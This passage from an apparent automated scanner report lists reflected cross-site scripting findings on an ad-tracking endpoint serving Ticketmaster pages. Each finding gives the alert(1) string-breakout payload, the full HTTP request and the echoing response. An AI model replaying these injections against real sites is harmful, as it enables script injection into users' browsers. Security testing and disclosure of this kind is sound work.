var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
...[SNIP]...

4.64. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35faf'-alert(1)-'c3b69505d19 was submitted in the _RM_HTML_event_time_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM35faf'-alert(1)-'c3b69505d19&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM35faf'-alert(1)-'c3b69505d19';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var
...[SNIP]...

4.65. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_zone_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ff5'-alert(1)-'ce08c7702c7 was submitted in the _RM_HTML_event_time_zone_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York40ff5'-alert(1)-'ce08c7702c7&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York40ff5'-alert(1)-'ce08c7702c7';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var
...[SNIP]...

4.66. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_eventid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a82c'-alert(1)-'cda4bbfe238 was submitted in the _RM_HTML_eventid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D437a82c'-alert(1)-'cda4bbfe238&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D437a82c'-alert(1)-'cda4bbfe238';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new
...[SNIP]...

4.67. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_fvalue_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52e9'-alert(1)-'5f1da305d60 was submitted in the _RM_HTML_fvalue_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=e52e9'-alert(1)-'5f1da305d60&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
1';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='e52e9'-alert(1)-'5f1da305d60';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
...[SNIP]...

4.68. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_majorcatid_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_majorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9979a'-alert(1)-'e992b3e6fb4 was submitted in the _RM_HTML_majorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=100019979a'-alert(1)-'e992b3e6fb4&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='100019979a'-alert(1)-'e992b3e6fb4';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
va
...[SNIP]...

4.69. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_minorcatid_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_minorcatid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c73ac'-alert(1)-'0a88c6c62c5 was submitted in the _RM_HTML_minorcatid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1c73ac'-alert(1)-'0a88c6c62c5&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
time='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1c73ac'-alert(1)-'0a88c6c62c5';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b3_h = new Image (1,1);
var b3_i = new Image (1,
...[SNIP]...

4.70. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pdate_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pdate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fad1c'-alert(1)-'a553e8d0dcf was submitted in the _RM_HTML_pdate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=fad1c'-alert(1)-'a553e8d0dcf&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:34 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='fad1c'-alert(1)-'a553e8d0dcf';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var min
...[SNIP]...

4.71. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_pday_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_pday_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a206'-alert(1)-'c65f39f1218 was submitted in the _RM_HTML_pday_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

